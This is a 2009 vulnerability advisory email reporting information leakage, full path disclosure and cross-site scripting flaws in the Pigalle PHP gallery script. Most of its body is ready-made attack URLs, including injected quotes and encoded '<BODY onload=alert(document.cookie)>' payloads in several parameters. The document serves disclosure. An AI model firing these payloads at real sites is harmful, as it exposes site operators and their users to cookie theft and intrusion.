Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

ToutVirtual VirtualIQ Multiple Vulnerabilities

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	09.11.2009
Subject:	Vulnerabilities in Pigalle

Hello 3APA3A!

I want to warn you about multiple security vulnerabilities in Pigalle.

These are Information Leakage, Full path disclosure and Cross-Site
Scripting vulnerabilities.

Information Leakage:

http://site/index.php

Versions of PHP, MySQL and web server are shown in meta-tags in source of
all pages.

Full path disclosure:

http://site/index.php

http://site/index.php?start=1'

http://site/index.php?mode=view&alb=IBM_Stucki&pic=1

http://site/index.php?mode=view&alb=1

http://site/index.php?mode=view

http://site/index.php?mode=album

http://site/index.php?mode=album&alb=1

http://site/config.inc.php

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.
jpg&size='

XSS:

http://site/index.
php?mode=view&alb=IBM_Stucki&pic=%3CBODY%20onload=alert(docum
ent.cookie)%3E

http://site/index.
php?mode=view&alb=%3CBODY%20onload=alert(document.
cookie)%3E

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.
jpg&size=%3CBODY%20onload=alert(document.cookie)%3E


Vulnerable are Pigalle 0.76-alpha and previous versions.

I mentioned about these vulnerabilities in Pigalle at my site
(http://websecurity.com.ua/3503/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua